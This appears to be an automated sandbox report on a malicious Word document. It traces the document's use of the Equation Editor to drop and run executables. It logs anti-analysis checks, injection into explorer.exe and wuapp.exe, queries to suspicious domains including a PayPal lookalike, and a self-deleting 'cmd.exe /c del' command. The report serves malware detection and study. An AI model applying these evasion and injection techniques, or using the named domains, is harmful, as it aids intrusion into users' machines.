          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\word.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\word.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\word.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\word.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\word.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wuapp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wuapp.exeRDTSC instruction interceptor: First address: 0000000000099904 second address: 000000000009990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wuapp.exeRDTSC instruction interceptor: First address: 0000000000099B6E second address: 0000000000099B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 848Thread sleep time: -300000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 3044Thread sleep time: -46000s >= -30000s
          Source: C:\Windows\SysWOW64\wuapp.exe TID: 2212Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\SysWOW64\wuapp.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wuapp.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00409AA0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeAPI coverage: 7.9 %
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00405426 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00405D9C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_004026A1 FindFirstFileA,
          Source: C:\Users\user\AppData\Roaming\word.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000007.00000000.1026135625.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000007.00000000.1025894713.000000000434F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0Q
          Source: explorer.exe, 00000007.00000000.1026135625.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: word.exe, 00000004.00000002.945543583.0000000000564000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000007.00000000.935522782.000000000037B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
          Source: explorer.exe, 00000007.00000000.1026232834.0000000004423000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.1026135625.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
          Source: explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009A320D GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009A320D GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 4_2_00405DDA GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009B6AAA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00409AA0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wuapp.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_000F03F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_000F061D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_000F06F7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_000F0736 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_000F0772 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_00A126F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wuapp.exeCode function: 8_2_01F726F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wuapp.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_0040ACE0 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009B1D57 SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009B1D88 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009B1D88 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 6_2_009B1D57 SetUnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exeDomain query: www.paypal-caseid521.com
          Source: C:\Windows\explorer.exeNetwork Connect: 98.137.244.37 80
          Source: C:\Windows\explorer.exeDomain query: www.storyofsol.com
          Source: C:\Windows\explorer.exeDomain query: www.createacarepack.com
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeSection unmapped: C:\Windows\SysWOW64\wuapp.exe base address: B30000
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeSection loaded: unknown target: C:\Windows\SysWOW64\wuapp.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeSection loaded: unknown target: C:\Windows\SysWOW64\wuapp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wuapp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wuapp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeMemory written: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeThread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeThread register set: target process: 1860
          Source: C:\Windows\SysWOW64\wuapp.exeThread register set: target process: 1860
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeProcess created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
          Source: C:\Windows\SysWOW64\wuapp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\dvukljmnr.exe"
          Source: explorer.exe, 00000007.00000000.961310848.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.950104825.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1022850637.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.961310848.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000000.961310848.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.950104825.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1022850637.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: GetLocaleInfoW,_GetPrimaryLen,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: GetLocaleInfoW,_GetPrimaryLen,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: EnumSystemLocalesW,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: GetLocaleInfoW,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: EnumSystemLocalesW,
